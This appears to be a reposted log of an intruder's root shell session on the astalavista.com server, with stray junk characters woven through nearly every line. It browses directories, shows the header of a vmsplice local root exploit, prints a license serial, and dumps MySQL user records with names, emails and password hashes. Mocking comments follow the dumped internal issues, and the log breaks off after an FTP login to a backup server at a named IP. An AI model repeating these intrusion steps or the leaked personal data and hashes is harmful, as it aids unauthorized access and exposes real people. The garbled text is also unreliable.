7 u" W# |" i; B/ l ^sh-3.2# cd com
& A& I! w; Y& K. ^; T2 gsh-3.2# ls -la0 \1 t# Q3 E/ X B
total 141208
' x$ f* o, e c6 `- q @drwx–x–x 10 com com 4096 Apr 28 12:40 . \/ e7 U( a$ i, Y K
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .. n$ m- O+ i. E2 D9 U" P8 O0 c
drwx—— 2 com com 4096 Jun 4 04:04 backups
- E. o: x$ q' H1 s! a& d& V-rw-r–r– 1 root root 2419504 Sep 28 2007 backup.sql
3 p! k0 b2 Q3 p) Fdrwxr-xr-x 2 com com 4096 May 12 15:20 backup_system: Q0 t0 w4 C" q( U$ {/ {9 V
-rw——- 1 com com 21880 Jun 2 08:07 .bash_history3 z3 u: H/ q1 {2 l
-rw-r–r– 1 com com 24 Sep 24 2007 .bash_logout
( t' {" ~3 j! |2 F-rw-r–r– 1 com com 176 Sep 24 2007 .bash_profile
: M* C L/ |" _-rw-r–r– 1 com com 124 Sep 24 2007 .bashrc+ q2 y: g5 `! r ^# L6 t
drwx–x–x 3 com com 4096 Jan 29 2008 domains" u5 {3 G8 w9 p5 N5 X) ]
-rw-r–r– 1 com com 16409 Jul 16 2008 FWUser.class.php.fixed, Z( e n' U( W" K4 G/ l& Z
drwxrwx— 3 com mail 4096 Jan 6 19:24 imap
) {( j9 n2 }$ v: `; E/ j; F-rw——- 1 com com 69 Nov 18 2008 .lesshst
. c& ~' A7 G/ d: c+ udrwx—— 2 com com 4096 Sep 24 2007 mail
7 Q6 r% o2 W. p" y6 C) p-rw——- 1 com com 13970 Mar 28 21:42 .mysql_history
, z! Q% G! @+ _5 R# `: W- Hdrwxr-xr-x 2 com com 4096 Aug 20 2008 .ncftp8 ?8 S/ j" ~# b, b
lrwxrwxrwx 1 com com 37 Sep 24 2007 public_html -> ./domains/astalavista.com/public_html& w$ j! G6 s$ y
-rw-r—– 1 com mail 34 Sep 24 2007 .shadow
3 W; Y" t" C' Z, u3 P$ S/ h3 d+ Q- ndrwx—— 2 com com 4096 Aug 26 2008 .ssh
, @" W- t# V5 j, B-rwx—— 1 com com 8515 Feb 10 2008 t# c" f9 N# X5 W7 {+ S
-rw-rw-r– 1 com com 6265 Feb 11 2008 t.c
2 N' m" v; f' h* P+ jdrwxrwxr-x 2 com com 4096 Jan 30 15:47 tmp; g4 V0 B# C0 E! `. B8 e1 ]( v
-rw-rw-r– 1 com com 617 May 20 2008 .toprc
0 s0 b5 D. B; D' R3 l-rw-rw-r– 1 com com 141851766 May 19 2008 version2-backup-20080519-0900.sql" @/ h t3 ? i) e+ \. }. y% E
-rw——- 1 com com 16629 Mar 28 21:46 .viminfo
( W4 v3 G, ^' G-rw-rw-r– 1 com com 51 Aug 25 2008 .vimrc, a# P! m2 K9 z5 z" w
F2 A# F8 R. rsh-3.2# head t.c } q# S- M9 S6 H: P5 U
/*: S6 H: t6 B' ~- W" [6 V
* jessica_biel_naked_in_my_bed.c
% ]$ i# I S7 s# K6 _*
; P" A3 l- n3 I. M: H5 t* i* Dovalim z knajpy a cumim ze Wojta zas nema co robit, kura.
5 h% I" p2 V, J3 ^ A$ \( ]" r& L* Gizdi, tutaj mate cosyk na hrani, kym aj totok vykeca./ D7 s) @' g8 b+ T6 N$ M
* Stejnak je to stare jak cyp a aj jakesyk rozbite.% H S+ s7 y; O2 H9 I5 X
*
# R8 `% L* h& s. f0 e* Linux vmsplice Local Root Exploit
7 V) z7 |5 ~+ U2 n- P. O* By qaaz
, V& S( I5 M! Y" r*" I3 {* X0 W* b9 t
1 y+ N( T8 w% `9 g
sh-3.2# cd /) a/ t" r T3 Q& b2 c$ l6 [5 x
sh-3.2# ls -la
2 T+ Z/ {9 N( E9 E0 Etotal 360+ J( w7 p( X& z- N3 a6 S
drwxr-xr-x 25 root root 4096 Jun 3 02:43 .
4 \2 r; p9 {5 n5 Z# Qdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..) o$ S1 e3 ?. h0 ]
-rw——- 1 root root 10240 Jun 3 02:39 aquota.group
2 G+ \7 |) t1 C; S5 x7 w: F( Y6 R-rw——- 1 root root 10240 Jun 3 02:39 aquota.user/ l" ^* X* O* \) {9 F
-rw-r—– 1 root root 819 Jul 17 2008 astalavista.us.db
& h+ |! s: p( r4 M8 d-rw-r–r– 1 root root 0 Jun 3 02:43 .autofsck
) b/ ?+ P& q# e6 N9 A- l-rw-r–r– 1 root root 0 Sep 16 2007 .autorelabel+ I& G1 d% t( D0 Z% G
drwxr-xr-x 3 root root 4096 Dec 29 2007 backup
# o3 h6 V4 G6 \% _8 ~2 ldrwxr-xr-x 2 root root 4096 Jun 4 04:03 bin. g' J7 M; w& A0 Q2 t
drwxr-xr-x 5 root root 4096 Jun 2 14:06 boot( ?4 y0 x1 m0 J7 H5 _) v
drwxr-xr-x 11 root root 3620 Jun 3 02:43 dev& F% C0 s3 L+ g# Y6 i9 d' X
drwxr-xr-x 84 root root 12288 Jun 4 03:16 etc, N `! n1 J. d
drwxr-xr-x 14 root root 4096 Mar 11 17:56 home9 S1 w& ?$ A: \8 d3 |# v( X( q N, h
-rw-r–r– 1 root root 13387 Mar 20 2008 httpd.conf) G) I# O% b3 h7 q/ F
drwxr-xr-x 11 root root 4096 Jun 4 04:02 lib
. ~; h5 Y: k! R& y$ V {: zdrwxr-xr-x 7 root root 4096 Jun 4 04:03 lib64
% s3 L, t% u: H1 s, J- mdrwx—— 2 root root 16384 Sep 11 2007 lost+found! L/ D, @3 {/ |# g: O5 k0 Q$ ^7 o
drwxr-xr-x 2 root root 4096 Mar 11 17:56 media
8 y2 s$ m: d4 ~' l0 F9 h2 H& c+ Ndrwxr-xr-x 2 root root 0 Jun 3 02:43 misc
3 g5 t) Y, U) z) _& {& F; m2 Fdrwxr-xr-x 2 root root 4096 Mar 11 17:56 mnt
6 x5 v& F {6 q) `. ?6 Y( u-rw-r–r– 1 root root 5859 Feb 3 2008 mrtg.cfg
$ M: x: p6 _5 Z" k P1 c+ \( \ }* Mdrwxr-xr-x 2 root root 0 Jun 3 02:43 net
. r5 W' m: P/ ]drwxr-xr-x 3 root root 4096 Mar 11 17:56 opt
- P# s5 g4 L& j" T* Q; m9 ^dr-xr-xr-x 264 root root 0 Jun 3 02:42 proc
! `, j% d- _2 \, tdrwxr-x— 15 root root 4096 Jun 4 08:40 root
( \$ s$ i2 Q% P% B! L% U9 Odrwxr-xr-x 2 root root 12288 Jun 4 04:03 sbin. ^( v. G! q+ u* y
drwxr-xr-x 2 root root 4096 Mar 11 17:56 selinux
8 B) V# t( C- ~5 ndrwxr-xr-x 2 root root 4096 Mar 11 17:56 srv& m' }$ \' z1 e' Z3 l6 J9 y
drwxr-xr-x 11 root root 0 Jun 3 02:42 sys
% G) ~& |& v5 K( gdrwxrwxrwt 4 root root 122880 Jun 4 10:35 tmp: H3 X5 q4 }$ A( n3 q. A) M+ T
drwxr-xr-x 16 root root 4096 Jun 2 13:56 usr
( V+ n+ h0 [7 i+ `9 Qdrwxr-xr-x 26 root root 4096 Jun 4 03:16 var
2 [: P% t+ f% `. B) S: G+ r$ e* b) P% w+ Z7 B- W
sh-3.2# cd opt
8 C3 c7 M$ r9 U5 z0 A% Z& ?2 vsh-3.2# ls -la* R) p7 g% T" s- ?
total 20
! K) Z) V4 q& T- D, j: |8 Tdrwxr-xr-x 3 root root 4096 Mar 11 17:56 .7 W( G$ K3 `; o# W# k" P F
drwxr-xr-x 25 root root 4096 Jun 3 02:43 .." _& J5 o, Y0 @. w9 g g+ x3 N
drwxr-xr-x 15 root root 4096 Mar 20 2008 lsws
7 r7 v# x" [1 h/ j4 a3 O6 v: |7 k& p) E# W: F& ]
sh-3.2# cd lsws/
, h5 ^" G3 h4 Xsh-3.2# ls -la2 d& |& o. e7 b, b; G1 h, `1 N7 y( U
total 1084 A* @. B4 R* y9 U0 {4 i5 j. D( t" K, t
drwxr-xr-x 15 root root 4096 Mar 20 2008 .& t3 k3 C7 R# c7 j- T, {
drwxr-xr-x 3 root root 4096 Mar 11 17:56 ..
, u, N! d# E9 {9 r6 {drwxr-xr-x 8 root root 4096 Mar 20 2008 add-ons
) N: f, K' k Cdrwxr-xr-x 13 root root 4096 May 29 15:10 admin
, e3 N \+ s& |drwxr-xr-x 5 apache apache 4096 May 29 15:10 autoupdate
' Y* z& u: H5 j* o% l7 g( T5 u6 zdrwxr-xr-x 2 root root 4096 May 29 15:10 bin
0 l, s5 T) O2 w; D3 p, bdrwx—— 4 apache apache 4096 Jun 3 02:43 conf( c4 Z: j7 g/ U1 G" }- w
drwxr-xr-x 7 apache apache 4096 Mar 20 2008 DEFAULT1 I. _& A8 s Q- B0 R* B, R: v. L1 H# n
drwxr-xr-x 2 root root 4096 Sep 15 2008 docs0 r+ o. e8 L2 m
drwxr-xr-x 2 root root 4096 May 29 15:10 fcgi-bin5 J) L( b( L: D: G) c4 U$ Z
drwxr-xr-x 2 root root 4096 Sep 15 2008 lib0 J: i. _8 g! x% H& c
-rw-r–r– 1 root root 6959 May 29 15:10 LICENSE
* A/ A5 v, ]; Q-rw-r–r– 1 root root 2214 May 29 15:10 LICENSE.OpenLDAP2 i/ N e' u1 e/ V& t# f
-rw-r–r– 1 root root 6279 May 29 15:10 LICENSE.OpenSSL
- o$ _. V) ^6 D8 n D' }" u-rw-r–r– 1 root root 3208 May 29 15:10 LICENSE.PHP
- M; r& Y% g# j8 w# }drwxr-xr-x 2 root root 20480 Jun 4 09:55 logs
$ |9 m+ S- l- e" d! J8 k4 F2 \" pdrwxr-xr-x 2 root root 4096 Mar 20 2008 php2 O* u. I' H5 @* C1 H# H
drwx—— 2 apache apache 4096 Mar 20 2008 phpbuild
+ g* W) o0 y4 W/ g8 @drwxr-xr-x 3 root root 4096 Mar 20 2008 share6 \# ~1 Y$ T7 ~# L& h+ }8 }
-rw-r–r– 1 root root 6 May 29 15:10 VERSION" f( i: S9 G$ J# t
6 B3 I/ a! I S% H
sh-3.2# cd conf# q# {+ B* E, E* a0 ^/ K6 n
sh-3.2# ls -la! H& ^7 }3 E! c
total 48
; a% @% a* d8 gdrwx—— 4 apache apache 4096 Jun 3 02:43 .
/ ? a0 o. s' `* Udrwxr-xr-x 15 root root 4096 Mar 20 2008 ..' I5 l* u ]! `% p/ B! ~
drwx—— 2 apache apache 4096 Mar 20 2008 cert
$ x4 p7 }# \( [8 l-rw-r–r– 1 apache apache 6668 May 29 15:13 httpd_config.xml& x5 ?% X+ B; a/ ?3 Z! b
-rw——- 1 apache apache 6613 May 27 18:33 httpd_config.xml.bak
) h1 W. ?7 q/ R6 V, |( A-rw-r–r– 1 root apache 0 Jun 3 14:11 .last
5 b/ ?5 j- t D- e: P-rw——- 1 apache apache 256 May 29 15:10 license.key
2 K {. G( W! `, y" ^7 z-rw——- 1 apache apache 256 Mar 21 2008 license.key.old
5 A$ U7 ]7 s( S3 q. g8 G' S5 V-rw——- 1 apache apache 3320 Mar 20 2008 mime.properties
+ s9 B4 r* L' |& e2 g-rw——- 1 apache apache 20 May 29 15:10 serial.no
5 v1 N& Z4 F$ }' }8 D- c* Zdrwx—— 2 apache apache 4096 Mar 20 2008 templates
8 ?- v# B; {. ~6 b1 v% M4 q0 ^) r) x$ P# d% z! k3 C
sh-3.2# cat serial.no0 h3 N0 w2 v1 O/ s( \1 P
IbDl-oVsO-CKqL-wVRa
7 S1 H: A }0 J% ~: n5 K- H9 ~: @$ q& ~4 T4 p8 I, ~( G8 U
sh-3.2# mysql
5 b: ^. f W1 P0 |# u9 qWelcome to the MySQL monitor. Commands end with ; or \g.
# ?. `- b a C! }9 d) KYour MySQL connection id is 286844- s+ f8 c: ]# G# h3 L2 c1 ]
Server version: 5.0.45-community-log MySQL Community Edition (GPL)
* A, F# K9 p2 q1 }: P( _& c
+ c; G5 A% \; h* ^# _) YType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.6 P; d N, p i5 e1 r" j2 p) u" Q: c
8 i% L% A9 B& u- [1 L* `mysql> show databases;: b* u/ z2 H. n n4 E+ a$ e* Q
+———————–+# K1 y) v, t6 ]7 K* E6 D
| Database |
- P8 g4 Y H& |& r( S9 p+———————–+; a2 t% p8 ], ^$ O/ Y. X+ f t
| information_schema |9 H3 _0 T3 R; O, v% ^. h
| astanet_ads |6 E! K& ^- U. A: _5 B4 H/ S
| astanet_mailing_lists |
2 _( V8 ~* o" q| astanet_mediawiki |
! w3 v" M+ P7 ]0 D m| astanet_membersystem |2 i4 b9 c/ N+ n% A# w/ _
| com_contrexx |
% W- v! t# ?1 U3 w! j& O, R| com_contrexx2 |/ |4 K+ I# H1 }' z# f- \7 r
| com_contrexx2_live |9 C) r' p: d- v0 c# v N0 ?+ f
| da_roundcube |3 S6 j+ v* F' j8 ~1 Y& P1 G. s/ H
| dolphin | @9 V3 Z: j" p L
| ideapool |. T- ]) L2 s" X
| mysql |
8 X3 v ~) ~8 i| test |
- _) Z/ O, [' t| yourmaster |; F. Q+ O) e0 p; y: K G4 B
+———————–+! f, |- A6 L1 S( B7 F6 `8 c; p
14 rows in set (0.00 sec)* y* e; F% X2 z1 Z- A
0 ?/ |% p0 E$ d* }
mysql> use ideapool
! ?8 y) V4 h! |; P; ^Database changed6 E5 y! P$ Q' | Y0 K( ^& d8 e( X
mysql> show tables;5 v' f# K8 L, C$ }
+———————————–+
) S) c- V1 ]9 ]- `5 r$ d" e" w| Tables_in_ideapool |
# e1 ~. ]) y' m& d3 ]+———————————–+
9 A3 Q( V" A3 S; K5 g- W. M7 W) J| eventum_columns_to_display |
7 ^0 t- h' S7 N' }1 F8 }| eventum_custom_field |8 P4 g6 x2 ~1 X/ w) s# L
| eventum_custom_field_option |: k7 e3 W5 ~" @3 q3 O6 C
| eventum_custom_filter |
$ q1 U+ B2 ^3 `' I- M$ S6 O| eventum_customer_account_manager |; N" G4 l( K0 m; `6 O
| eventum_customer_note |
; S7 m/ f! A4 J| eventum_email_account |; Y+ d: l+ x4 c$ c
| eventum_email_draft |; Z% V; C8 D8 @: D
| eventum_email_draft_recipient |' [6 ?; T" |( M( Q
| eventum_email_response |
2 x4 X0 V& u6 E) V- i- a: S| eventum_faq |
. L3 n6 V8 V9 P6 \+ k" g| eventum_faq_support_level |
# h u# U/ j/ j& U1 d: G- w1 S| eventum_group |, t( O! m# m. Z7 D
| eventum_history_type |, r& k8 d/ Y2 C1 t* g6 ?
| eventum_irc_notice |
: v/ `: l0 i% b$ f4 v1 ]| eventum_issue |
6 L' @3 M( b$ o ` o4 c| eventum_issue_association |4 M }( L. }' |" _
| eventum_issue_attachment |1 h9 z9 `. D# T$ x1 n6 D2 ?
| eventum_issue_attachment_file |
. c: H0 d2 p2 I3 i1 ]3 ^| eventum_issue_checkin |
4 o; {! _7 D) S! f$ C6 h| eventum_issue_custom_field |
$ Q! L& W. H5 N3 a( {6 q| eventum_issue_history |3 }+ c; z7 F- G# X# L7 {1 ]$ k
| eventum_issue_quarantine |3 ~- _2 s& x9 X5 `. T' F: R
| eventum_issue_requirement |3 x: G) s5 S! q" }
| eventum_issue_user |
& e o* ^$ `3 U9 M) O; U| eventum_issue_user_replier |- `0 i1 k3 G9 k- ^
| eventum_link_filter |
* Q3 s {- @+ [3 E9 V* E& @5 g$ p| eventum_mail_queue |- Q& A- i" B) W Z7 B
| eventum_mail_queue_log |
) m0 W% {5 C1 W8 O5 D3 L| eventum_news |( O- Z8 f. G" l6 K% u
| eventum_note |
4 o; s+ D9 K5 ~4 _0 o9 ?) w$ t) U+ E2 V| eventum_phone_support |1 X' n/ {0 {- y$ q1 z* k, y
| eventum_project |
' B2 c( j4 @) y) `+ f$ Q7 [- f| eventum_project_category |
5 J& B: ~8 P" p- ?' A/ g0 J| eventum_project_custom_field |" r, Q' V9 Y: N- a
| eventum_project_email_response |
# [' k8 K& Y! y" f4 [: R) S| eventum_project_field_display |
/ O, |1 S* w! \5 K$ J| eventum_project_group |% C# j2 |9 U4 l. Z1 q
| eventum_project_link_filter |( K! t3 e6 q, N2 j7 y& w! w* m
| eventum_project_news |: T0 d, q+ Z: I) I1 z9 ]/ W( x- u
| eventum_project_phone_category |
, L, q1 ]( Q7 t' M| eventum_project_priority |
: g2 Y; g7 s/ ?7 J' m| eventum_project_release |% j: U/ ]! ?8 _8 B8 Y. c
| eventum_project_round_robin |
. t. x- r5 Z5 R/ j| eventum_project_status |
6 t1 y8 J: X5 l" Q9 q| eventum_project_status_date |! q5 A1 F4 a. u. Z& O1 Z
| eventum_project_user |% ? p9 z6 p& W
| eventum_reminder_action |2 V/ B8 ~6 q; W* i, Z5 s$ W
| eventum_reminder_action_list |
) ^' g' W- n$ U n# w| eventum_reminder_action_type |5 ]' Z' j' F9 P1 O
| eventum_reminder_field |
; u6 }; E$ [8 m! O2 C2 a$ _| eventum_reminder_history |
( c! ^+ {+ l- w3 {/ ]. X || eventum_reminder_level |' K& M: w) z2 X# g d
| eventum_reminder_level_condition |
) ?* j7 ?7 s" D; Y| eventum_reminder_operator |
$ y1 `& L$ ] r& K7 e. C| eventum_reminder_priority |
2 M: d& s) ^9 T( E8 I| eventum_reminder_requirement |) h4 B. [7 g6 Y8 u* R" @; i
| eventum_reminder_triggered_action |
! g7 L' n! C5 d7 P- V) || eventum_resolution |" X7 h2 u5 b2 Y# `, R. M
| eventum_round_robin_user |
! [2 N- d' w! y* }| eventum_search_profile |3 J( a @5 R: T% U/ C; r
| eventum_status |
# U- U! ~. D* y7 j, v1 d| eventum_subscription |7 ]. C: t) C1 y+ Q$ D+ | y
| eventum_subscription_type |
* D' {2 r: `/ l4 A, O) D| eventum_support_email |" _2 R9 c3 C3 f( L0 h
| eventum_support_email_body |8 E) d' \/ u2 W& w" h7 j% y# y
| eventum_time_tracking |
8 |7 W+ O/ {) a$ t% w& ~: c' v| eventum_time_tracking_category |& z' I$ D7 l- _6 K; p* R
| eventum_user |% W$ e' E1 i* ~9 r
+———————————–+
% y( ~* ]9 T: [% q5 j( q7 Y, ?69 rows in set (0.00 sec)0 W$ W/ d _, E- a! f
2 f6 _- ?% Q" S# @0 L/ y- e# M Umysql> describe eventum_user;+ E( K- N- c7 C7 ?* a, F# A! s3 {! B
+————————-+——————+——+—–+———————+—————-++ F. L+ Z" L$ k
| Field | Type | Null | Key | Default | Extra |/ C/ ^& j! f/ {1 E% O8 J# k4 a: W# c
+————————-+——————+——+—–+———————+—————-+
( X6 E5 F- ~0 p* B0 J5 U| usr_id | int(11) unsigned | NO | PRI | NULL | auto_increment |: j0 S. P9 C' W [3 ]- Z+ X
| usr_grp_id | int(11) unsigned | YES | MUL | NULL | |
7 C, F5 W! r) Z% x5 J' L| usr_customer_id | int(11) unsigned | YES | | NULL | |
9 ?& m6 c5 C7 W9 L3 M- ]| usr_customer_contact_id | int(11) unsigned | YES | | NULL | |; |( {1 ~; C8 k1 t8 M* R n( f
| usr_created_date | datetime | NO | | 0000-00-00 00:00:00 | |
, Q) O8 B8 D2 g j' K# K| usr_status | varchar(8) | NO | | active | |) {, e- e5 t! E/ b$ ]3 W+ O0 l% r
| usr_password | varchar(32) | NO | | | |
9 n. \2 E' m9 _1 r| usr_full_name | varchar(255) | NO | | | |
u, x/ Q/ D$ _* _, L' I/ A| usr_email | varchar(255) | NO | UNI | | |
% ^' v% e/ u5 \/ o4 `0 X/ F/ E| usr_preferences | longtext | YES | | NULL | |
( ~3 M2 C W0 [| usr_sms_email | varchar(255) | YES | | NULL | |1 S( r# T) _* j3 Z# K2 ~$ f: O" G
| usr_clocked_in | tinyint(1) | YES | | 0 | |: [% P( k& @2 U6 z1 d# B
| usr_lang | varchar(5) | YES | | NULL | |
( ?2 K9 U/ L7 h8 Y+————————-+——————+——+—–+———————+—————-+8 @+ [/ b. Q+ ~. }2 A
13 rows in set (0.00 sec)
) U2 ^* D# s3 \3 `9 ~) V" _3 j
* J) P2 z' m( n7 r8 Nmysql> select usr_full_name,usr_email,usr_password from eventum_user;& \8 X+ U. |, q. J9 B' k, a% a& f6 b
+———————-+——————————-+———————————-+
3 s( E. [8 {# V3 j| usr_full_name | usr_email | usr_password |
; |! m B' e7 @- o4 I( F+———————-+——————————-+———————————-+
- A: b2 {3 s3 ?1 I: S/ T" r| system | 链接标记system-account@example.com | 14589714398751513457adf349173434 |( E1 }% ^2 J% E
| Developer (Paulo) | 链接标记paulo.santos@astalavista.ch | 26a35a1cf8895c27fb37ef4cf149f7bb |
2 {8 T& A. b! Y" \! Q5 [. {" o| Be1er0ph0r | 链接标记be1er0ph0r@gmx.de | 229766dc0ca1fb67160a8782321dfdce |% N5 V5 H0 T9 S$ U
| Admin | 链接标记pascal.mittner@astalavista.ch | 57c2877c1d84c4b49f3289657deca65c |6 f0 I, ], l) f5 c4 n9 g) q
| ADMIN | 链接标记admin@astalavista.ch | f6fdffe48c908deb0f4c3bd36c032e72 |
" B6 H5 z/ G* D; P| USER | 链接标记user@astalavista.ch | 5cc32e366c87c4cb49e4309b75f57d64 |
B0 K- [9 N) j/ q: e6 u| Glafkos - (nowayout) | 链接标记glafkos@astalavista.com | f7735ab119023a8abb2301e67f81cd67 |8 N# O5 H" o% {- A. V
| Joao | 链接标记joao.pontes@astalavista.net | f805c071d7c823b937448c54c047b9fd |
2 J" E/ H5 A' y' }6 W, k1 E, t| Pascal | 链接标记pm@astalavista.ch | e10adc3949ba59abbe56e057f20f883e |; A$ s5 l9 G0 c8 }8 v
| commander | 链接标记commander@astalavista.com | 932cd250918f881d41feb0b93883a926 |
5 E# Y8 o9 x% x2 [# v| ishtus | 链接标记ishtus@astalavista.com | a587ffc88b3dbbba3fd2fe67af649ff0 |
; D% z3 d0 Y, l: F2 K| sykadul | 链接标记sykadul@astalavista.com | 20224a2f3eeb57a13a10b4df543c128e |& j X$ t) V0 s6 H6 D
| Zach McElroy | 链接标记admin@badfoo.net | 33c5d4954da881814420f3ba39772644 |
7 i4 Q. y( e/ i5 l) z| usb | 链接标记usbenigma@hushmail.com | b513f22c3db6932855ad732f5f8a10a2 |& T- u9 G! C# j( ]
| cyph3r | 链接标记cyph3r@astalavista.com | 6e1e50017a945e874d52ec91f9ab2cee |
1 P7 X9 W4 p f( }* X/ i) w7 Y% U# R+———————-+——————————-+———————————-+
. J0 R" s& J$ P' }15 rows in set (0.00 sec)% y; r3 f/ x- p
) z. C2 C2 Q4 x- T7 Cmysql> select iss_description from eventum_issue where iss_id = 43;$ R& {6 X& j' ?9 [% ?/ P1 s+ I- t
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
* ]7 w: A' I0 e| iss_description ! e# P; L/ P+ C' a, @9 r7 N1 E0 _
|& H8 `7 x* V: o( b
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+
' ~% Q4 }# z& H J| Ok guys, to boost our traffic and revenue what we have to do is keep users logged in… how to do that? well think about it… if a user is watching a movie… he’ll be
& E) h" r, w3 k& x) c! [3 U3 vconnected for 90 mins… 120mins… so what i propose is something like:# I7 w3 ^) {9 v4 X) B- Q* L& g
链接标记[url]http://www.surfthechannel.com/[/url]
8 @* W, |- i0 csince they only provide LINKS to the movies they are LEGAL and don’t break DMCA rules… so we could do the same… “iframe” the content on our website or use a system' b8 N. x. J% @0 P+ I! t3 V3 q
like podcast that uses our own flash player to stream content from other places, therefore the content NOT BEING HOSTED ON OUR SERVERS but only viewed… which doesn’t
. }" Z2 y' \9 \7 rbreak any laws as far as i am aware (we should research on that just to be sure though!) Of course we would have to provide users with the button to take the content off
% E3 q& P% }& n; j" yif they think it breaks copyright laws and we will remove it… i think that makes it on the border of DMCA…
/ z, C# l# K% o% z3 q X- Y8 D8 c, ?/ I: _
We could also put advertisement during play on the flash video player itself… extra $$…3 {6 b, {9 O0 F, T! `3 M' V' U% r
0 N0 S8 w' u7 j/ F! O4 G/ y8 @By sykadul |9 M- T0 Y1 C2 U: {, I4 W6 O" Q" x
+————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————————-+2 k7 ^# R+ U& c$ l9 I
1 row in set (0.00 sec)' u/ k# Q4 v- b6 w& t& {9 r
& Z+ j( `5 E2 T// Money and extra $$ is all they care about. remember that.
% ]1 L$ W4 W7 F1 P$ }& k3 t/ k8 e/ _: | z( t
mysql> select iss_summary,iss_description from eventum_issue where iss_id =42;
) E k& v1 Z7 H2 @$ |1 n5 M( s& d$ {+————————+——————————————————————————————————————————————————————————————————————————————-+6 ]# y( N8 J2 W/ n2 V5 b% f
| iss_summary | iss_description " e0 i! S( K( F: s5 h/ [8 x4 d7 V( ?
|9 z( L' x( H0 s% m1 I7 e" G
+————————+——————————————————————————————————————————————————————————————————————————————-+
( P% R" m# u, ~# X B| Forum for REAL EXPERTS | Hello,
6 W& \5 ?: B1 n( |# ~: H: u& a+ v( w' h' S8 ~. E
Ishtus and I,
8 h* k- i# A0 l2 ~2 D) x4 O1 r. s% [& f
Came up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide. b$ d+ |( L1 V! X2 J6 j& L2 T# v B& p4 O
ONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..
( P. e! I! R- T8 l& u- ^9 K* t! p
One example a friend of mine from coresecurity.com!" c [4 _9 @ \: m( ^3 F
0 D: Q- h: A& ?# B0 r; C J! cWe could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc.., `6 f5 r5 H8 R1 T" \4 c. B
" T2 {+ L, F8 R0 B|7 h2 I2 d# @7 {) q4 M7 v( K
+————————+——————————————————————————————————————————————————————————————————————————————+
9 E4 E+ y" z9 }1 row in set (0.00 sec)1 U. J+ F$ F; \ e
1 f) }# o5 F$ W* G" z
// What an awesome yet original idea Ishtus and him… bring MORE security “experts”, thats exactly what the world needs…
/ ]3 J: d7 u3 @
+ A. @. Z. w _8 N' Omysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;( w& n1 |8 O4 ~& d( }- x! _
+——————+———————————————————————————————+
$ B. Q1 R( f9 Y+ T* e) W| iss_summary | iss_description |" S# v- B& L q: [3 K0 U
+——————+———————————————————————————————+
- e' `( B( O: T$ @" \. Z7 u& @| Website guidance | Virtual Girl which guides you trought the website. |7 L: k/ a" k: G6 B/ N0 H
2 k4 c, D, ^' B4 d M
We need a girl with who you can ( talk )!!!: _' ^- u; v8 d* J0 H3 N) v
Also for the News!
6 U6 }# y/ u6 G. m: `So my suggestion is a girl who read you the news loud if you like!
; _! f1 d4 F7 T; ^; O6 S" g. Xyou can choose between read yourselfe or she read it for you or both!2 f# ^: _6 H- T6 c" ]1 t' f) P1 }/ C
9 O, G1 e0 C7 g3 DGo to 链接标记[url]www.heise.de[/url]! There is an example for Voice News! It’s a good thing!!!
! G" f! ?3 B$ y" o, x! E
! M7 h8 R8 x; sHave a look on the example girls!!$ X* d# F4 }4 d
3 F9 B" x1 n& p8 m' I2 Y( V2 E! e
链接标记[url]http://www.yaoti.com/de/free_yaoti.html[/url]
& i# f, v9 ]" c" }0 a& Y0 M, ~& o
or that
! c0 z1 j: u5 g$ V8 q: g b$ G" v
) |; W! Y' G' q" K$ f8 g0 c$ _链接标记[url]http://www.yellostrom.de/[/url]& }: `" k5 W& g/ ]6 F) D# q7 E5 r
1 X5 f$ H) W2 v|
2 ]/ V. K7 w! w8 ?( G. r/ m* L+——————+———————————————————————————————+
6 L+ u/ c" l& l& v0 o! @1 row in set (0.00 sec)
3 [6 [8 y" _, m; M! r& }: E
6 X1 n9 l9 |) |9 Z" ]/ Y/ C: z. Y// ha ha.( @1 D8 J" s, O6 e
1 j! o, W5 L& Y8 W$ R% lmysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;2 o" p+ }& ]) B
+————————–+———————————————————————————————————–+
5 W" \' c& d, V9 Z| iss_summary | iss_description |
) {1 H! K( O! W8 j+ d$ T0 ^+————————–+———————————————————————————————————–+
9 n8 r( F/ h5 S3 D| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name. |) A2 U8 M p s- f; Y5 e
+————————–+———————————————————————————————————–+5 o( g2 G7 y: k+ t* P
1 row in set (0.00 sec)9 M3 w, a' C Y5 d2 x$ ?+ }
( n) f6 u, B+ f, q2 l* V3 ~// LOL.
. d( e$ O$ B9 X8 v' q- \) j, _' o t) @- g& e, i p
mysql> exit, ^+ l5 k t) ]: F, T2 ?& i6 F' ?- Y; u
Bye) u0 r# v1 n" U
$ i6 |" r) J2 {4 R6 y& osh-3.2# ftp 212.254.194.163
* H! g5 K! V& j [, rConnected to 212.254.194.163.
5 v6 i2 m$ M6 ~- ~220 BackupCOM_VW FTP server ready.) ]+ Z0 R; t; o
504 AUTH: security mechanism ‘GSSAPI’ not supported.
) M$ T1 n7 w4 D- A$ B504 AUTH: security mechanism ‘KERBEROS_V4′ not supported.
! U. n h* p R: I2 E6 I$ o) j' ?KERBEROS_V4 rejected as an authentication type
' c- `% W' L T! S) hName (212.254.194.163:root): astalavista.com/ o" u) ~8 c, g0 k; }
331 Password required for astalavista.com.
& L# p4 j \% W$ t+ KPassword:
, n& T9 j4 A* N4 a" t; V: D230 User astalavista.com logged in.% x# w2 d0 M h4 y, ` _4 y, R6 v) _
Remote system type is UNIX.
4 j) M8 B* @4 D8 ]Using binary mode to transfer files.2 o' ?/ O2 v, ?0 A! m0 n
ftp> ls -la) x8 X4 D9 _4 C' E. o
227 Entering Passive Mode (212,254,194,163,2,188)( h v* P7 H# o5 i
150 Opening BINARY mode data connection for ‘file list’.
, x6 |8 Y2 q4 ~0 ~# Pdr-x—— 1 root users 4096 Jun 4 06:13 astalavista.com
